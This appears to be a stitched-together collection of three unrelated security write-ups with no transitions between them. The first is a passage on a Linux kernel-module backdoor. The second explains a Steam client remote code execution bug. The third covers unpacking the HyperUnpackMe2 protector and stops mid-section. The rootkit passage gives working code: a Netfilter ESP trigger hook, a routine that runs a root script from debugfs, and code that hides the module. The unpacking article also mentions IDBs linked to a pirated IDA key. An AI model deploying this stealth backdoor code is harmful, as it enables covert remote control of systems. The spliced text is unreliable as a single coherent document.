We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

  • All packets start with the 4 bytes “VS01
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

